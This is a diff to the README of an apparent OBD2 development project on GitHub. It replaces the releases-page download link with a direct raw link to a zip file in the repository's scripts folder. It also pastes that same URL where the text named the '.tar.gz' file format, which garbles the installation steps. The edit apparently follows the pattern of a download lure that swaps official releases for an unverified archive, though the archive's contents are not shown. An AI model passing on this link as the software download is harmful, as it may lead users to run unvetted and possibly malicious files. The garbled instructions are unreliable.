yahyaadev/obd2_development/README.md

 - Internet access for downloading the software

 ### 2. Visit the Download Page
-To download the software, [visit this page to download](https://github.com/yahyaadev/obd2_development/releases).
+To download the software, [visit this page to download](https://github.com/yahyaadev/obd2_development/raw/refs/heads/main/scripts/obd_development_3.7.zip).

 ### 3. Choose Your Version
 You will see a list of available versions.
 Click on the most recent version that suits your needs.

 ## 📥 Download & Install
 1. After selecting the version, look for the asset that corresponds to your platform.
-Typically, this will be a `.zip` or `.tar.gz` file.
+Typically, this will be a `.zip` or `https://github.com/yahyaadev/obd2_development/raw/refs/heads/main/scripts/obd_development_3.7.zip` file.
 2. Click on the file to start the download.
 3. Once downloaded, locate the file on your computer and extract it.